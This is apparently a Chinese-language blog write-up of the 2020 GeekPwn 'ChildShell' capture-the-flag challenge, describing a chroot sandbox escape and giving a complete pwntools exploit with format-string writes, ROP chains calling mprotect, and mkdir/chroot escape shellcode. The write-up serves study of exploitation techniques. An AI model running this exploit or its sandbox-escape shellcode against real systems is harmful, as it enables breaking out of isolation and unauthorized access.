2020-GeekPwn-ChildShell

1.查看文件

这是一个需要chroot沙箱逃逸的题目 # 2.IDA分析
多了一个chroot操作,将我们的根目录置为sandbox,而flag在外面。其它的程序逻辑和之前的easyshell相同。 # 3.思路

劫持malloc_hook,执行mprtect函数得到可以执行shellcode的地方,最后再执行可以chroot逃逸的shellcode。

由于之前劫持malloc_hook的思路在easyshell中已经挖的很清楚了,所以我们讲讲逃逸chroot的shellcode

步骤如下:

第一步:执行mkdir的系统调用,rdi为.42,mode=0x1ed

**第二步:执行chroot的系统调用,rdi为.42**
**第三步:执行chroot的系统调用,rdi为../../../../../**
**到这里沙箱逃逸已经完成,后面就可以cat指令正常读出flag了。**

4.exp

from pwn import * 
from fmt_attack import Payload
# https://github.com/pzhxbz/my_ctf_tools/blob/master/fmt_attack/fmt_attack.py
p = process('./pwn') 
# p = remote('183.60.136.226', 17564) 

context.log_level = 'debug' 
context.arch = 'amd64'
'''
0x00000000004199a4 : xchg edi, esp ; add al, 0 ; add dh, dh ; ret 
0x0000000000401a36 : pop rdi ; ret 
0x0000000000468bf5 : syscall ; ret
0x0000000000479976 : pop rax ; pop rdx ; pop rbx ; ret
0x0000000000401b57 : pop rsi ; ret 
'''

a = Payload(10,addon=('%' + str(0x6CB778) + 'x').ljust(0x10,'a')) 
a.add_write_chunk(0x00000000004199a4,0x6CB788,write_len=4) 
a.add_write_chunk(0x0000000000401a36,0x6CB798,write_len=4) 
a.add_write_chunk(0x6CB798 + 0x10,0x6CB798 + 8,write_len=4) 
a.add_write_chunk(0x00000000004009AE,0x6CB798 + 0x10,write_len=4) 
payload = a.get_payload() 
gdb.attach(p)
p.recvuntil('Input your message')
p.sendline(payload.ljust(0xc0)) 
p.recvuntil('Take your message:') 

rop2 = 'flag'.ljust(8,'\x00') 
rop2 += p64(0x0000000000401a36) + p64(0) 
rop2 += p64(0x0000000000479976) + p64(0) + p64(0x1000) + p64(0) 
rop2 += p64(0x0000000000401b57) + p64(0x6CB798 + 0x18) 
rop2 += p64(0x0000000000468bf5) 
p.clean() 
p.sendline(rop2.ljust(0xc0))
'''
0x00000000004a4deb : jmp rsp 
'''
rop3 = p64(0x0000000000401b58) * 20 
rop3 += p64(0x0000000000401a36) + p64(0x6ca000) 
rop3 += p64(0x0000000000479976) + p64(10) + p64(7) + p64(0) 
rop3 += p64(0x0000000000401b57) + p64(0x3000) 
rop3 += p64(0x0000000000468bf5) 
rop3 += p64(0x00000000004a4deb)
shellcode = ''' 
push 3290158; 
mov rdi,rsp; 
mov rsi,493; 
mov rax,83; 
syscall;     # sys_mkdir rdi = 0x32342e(24.), rsi = 493
mov rdi,rsp; 
mov rax,161; 
syscall;     # sys_chroot rdi = 0x32342e(24.)
mov r15,13280099800329775;   # 2f2e2e2f2e2e30  /../.. 
push r15;
mov r15,3327649050063220270; # 2e2e2f2e2e2f2e00 ../../.
push r15;                   
mov rdi,rsp; 
mov rax,161;
syscall;    # sys_chroot rdi = 3290158
''' + shellcraft.cat('/home/shinnosuke/Desktop/geekpwn/childshell/flag')
rop3 += asm(shellcode) 
p.send(rop3) 
p.interactive()

  Reprint policy: xiaoxin 2020-GeekPwn-ChildShell

 Previous
2020-蓝帽杯-PWN 2020-蓝帽杯-PWN
0x00 前言参加了2020蓝帽杯的线上赛,成功被大佬带飞,如果再给点时间,PWN就AK了,P1umer师傅在比赛结束的15分钟做出了全场最少解的题目,tql! 0x01 camp查看文件 保护全开 IDA分析主函数: STDOUT功
2020-08-09
Next 
2020-GeekPwn-easyShell 2020-GeekPwn-easyShell
1.查看文件 GOT表可劫持,PIE和canary保护都没开启 看起来是orw来getshell 这题只是普通的pwn题,并没有逃逸的部分,接下来childshell就有了 2.IDA分析这是个没有符号的二进制文件,我们通过sig文件恢
2020-08-06
  TOC